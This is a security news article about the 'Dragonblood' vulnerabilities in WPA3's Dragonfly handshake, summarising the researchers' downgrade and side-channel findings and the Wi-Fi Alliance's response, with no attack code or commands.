Security Experts:

Connect with us

Hi, what are you looking for?


Data Protection

‘Dragonblood’ Flaws in WPA3 Allow Recovery of Wi-Fi Passwords

A series of vulnerabilities discovered by researchers in the WPA3 protocol can allow an attacker to obtain the password of a Wi-Fi network.

A series of vulnerabilities discovered by researchers in the WPA3 protocol can allow an attacker to obtain the password of a Wi-Fi network.

Officially launched in June 2018, the latest version of the Wi-Fi Protected Access (WPA) protocol is designed to provide better protection against offline dictionary attacks and password guessing attempts, improved security even when a less complex password is used, and forward secrecy to protect communications even if the password has been compromised.

WPA3, for which Personal and Enterprise variants are available, will gradually replace WPA2, but it will likely take several years until it’s widely adopted. In the meantime, WPA2 will continue to be maintained and improved.

Dragonblood vulnerabilities in WPA3Mathy Vanhoef of New York University Abu Dhabi and Eyal Ronen of Tel Aviv University and KU Leuven have analyzed WPA3, specifically its Simultaneous Authentication of Equals (SAE) handshake, which is commonly known as Dragonfly. It’s worth noting that Vanhoef was one of the researchers who discovered the WPA2 vulnerabilities known as KRACK (Key Reinstallation Attack).

Vanhoef and Ronen’s analysis of WPA3 led to the discovery of two types of vulnerabilities, dubbed Dragonblood, that can be exploited to recover a Wi-Fi network’s password: ones that allow downgrade attacks and ones that can result in side-channel leaks. They have also uncovered a flaw that can be exploited to cause a denial-of-service (DoS) condition on an access point (AP) after bypassing the DoS protection mechanisms in WPA3.

“Our downgrade attack enables an adversary to force a client to partly execute WPA2’s 4-way handshake, which can subsequently be used to perform a traditional brute-force attack against the partial WPA2 handshake. Additionally, we also discovered downgrade attacks against the Dragonfly handshake itself, which can be abuse to force a victim into using a weaker elliptic curve than it would normally use,” the researchers said.

“Our side-channel attacks target Dragonfly’s password encoding method. The cache-based attack exploits Dragonfly’s hash-to-curve algorithm, and our timing-based attack exploits the hash-to-group algorithm. The information that is leaked in these attacks can be used to perform a password partitioning attack, which is similar to a dictionary attack,” they explained.

According to the experts, these password partitioning attacks can be executed with $125-worth of Amazon EC2 computing power for an 8-character lowercase password. The CVE identifier CVE-2019-9494 has been assigned to the side-channel flaws.

An attacker who is in range of the targeted Wi-Fi network can obtain its password and gain access to sensitive information, such as passwords, emails, payment card numbers, and data sent via instant messaging applications, Vanhoef and Ronen said.

The researchers pointed out that these attacks also work against the Extensible Authentication Protocol (EAP), specifically EAP-PWD.

The experts have published a paper detailing their findings, along with some tools that can be used to launch attacks.

The Wi-Fi Alliance, the non-profit organization whose global network of members maintains Wi-Fi technology, says these vulnerabilities only impact “a limited number of early implementations of WPA3-Personal” and there is no evidence that they have been exploited for malicious purposes.

“WPA3-Personal is in the early stages of deployment, and the small number of device manufacturers that are affected have already started deploying patches to resolve the issues. These issues can all be mitigated through software updates without any impact on devices’ ability to work well together,” the organization said.

Related: New Method Discovered for Cracking WPA2 Wi-Fi Passwords

Related: Lenovo Patches Critical Wi-Fi Vulnerabilities

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Identity & Access

Hackers rarely hack in anymore. They log in using stolen, weak, default, or otherwise compromised credentials. That’s why it’s so critical to break the...

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.

Mobile & Wireless

Apple rolled out iOS 16.3 and macOS Ventura 13.2 to cover serious security vulnerabilities.

Email Security

Microsoft is urging customers to install the latest Exchange Server updates and harden their environments to prevent malicious attacks.

Mobile & Wireless

Technical details published for an Arm Mali GPU flaw leading to arbitrary kernel code execution and root on Pixel 6.


Security researchers have observed an uptick in attacks targeting CVE-2021-35394, an RCE vulnerability in Realtek Jungle SDK.